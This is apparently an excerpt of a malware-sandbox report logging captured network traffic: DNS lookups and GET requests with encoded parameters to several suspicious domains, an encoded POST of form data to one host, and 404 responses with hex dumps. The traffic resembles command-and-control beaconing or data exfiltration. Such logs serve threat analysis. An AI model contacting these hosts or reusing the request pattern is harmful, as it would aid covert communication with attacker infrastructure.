Source: global traffic	HTTP traffic detected: GET /0mwe/?Ih6=GzF8v0ph3F&T0JX6z9=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg== HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /g3h7/?T0JX6z9=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&Ih6=GzF8v0ph3F HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.canadavinreport.siteUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /t322/?Ih6=GzF8v0ph3F&T0JX6z9=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg== HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.yunlekeji.topUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /iuvu/?T0JX6z9=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&Ih6=GzF8v0ph3F HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.logidant.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /36be/?Ih6=GzF8v0ph3F&T0JX6z9=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q== HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.laohub10.netUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /kf1m/?T0JX6z9=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&Ih6=GzF8v0ph3F HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.zkdamdjj.shopUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.izmirescortg.xyz
Source: global traffic	DNS traffic detected: DNS query: www.aballanet.cat
Source: global traffic	DNS traffic detected: DNS query: www.madhf.tech
Source: global traffic	DNS traffic detected: DNS query: www.canadavinreport.site
Source: global traffic	DNS traffic detected: DNS query: www.yunlekeji.top
Source: global traffic	DNS traffic detected: DNS query: www.logidant.xyz
Source: global traffic	DNS traffic detected: DNS query: www.laohub10.net
Source: global traffic	DNS traffic detected: DNS query: www.zkdamdjj.shop

Source: unknown

HTTP traffic detected: POST /6xrr/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Length: 208Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Host: www.aballanet.catOrigin: http://www.aballanet.catReferer: http://www.aballanet.cat/6xrr/User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Data Raw: 54 30 4a 58 36 7a 39 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 41 69 62 59 58 4b 50 50 69 6d 58 72 30 44 4f 58 67 33 41 54 44 6f 45 6d 77 52 75 59 30 47 75 6d 38 2b 61 71 47 59 3d Data Ascii: T0JX6z9=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4AibYXKPPimXr0DOXg3ATDoEmwRuY0Gum8+aqGY=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:50:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ImrMpkmAsfhOWBCeZmpUyqIBfxtMqRI3xbnbv1eu34%2FlnQnjILlQ2RMZomhhxoAq%2BFOuPs8JQNt4jWiqjjf0J843oouERaVVFSe29ozky%2FVLi6qV7pLiF%2BvKjtAoKGSezj8BQMVVQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900141318ac943dc-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1746&rtt_var=873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=379&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 64 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 Data Ascii: 4d5<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div st
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:50:28 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:50:31 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:50:33 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: F-WEBDate: Sat, 11 Jan 2025 01:51:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 910Connection: closeFAI-W-FLOW: 90789038Service-Lane: e8594f12d42b28ee5775cc58b9d2e933FAI-W-AGENT_AID: 32663896Update-Time: 1736399500Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Frame-Options: SAMEORIGINSet-Cookie: _cliid=fcBsX7AbV_wG1TsB; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 01:51:40 GMT; HttpOnlySet-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 01:51:40 GMT; HttpOnlyData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 3c 64 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: F-WEBDate: Sat, 11 Jan 2025 01:51:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 910Connection: closeFAI-W-FLOW: 90938038Service-Lane: e8594f12d42b28ee5775cc58b9d2e933FAI-W-AGENT_AID: 32663896Update-Time: 1736399500Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Frame-Options: SAMEORIGINSet-Cookie: _cliid=nSCOZ4gjGaJIxigS; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 01:51:42 GMT; HttpOnlySet-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 01:51:42 GMT; HttpOnlyData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 3c 64 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <d
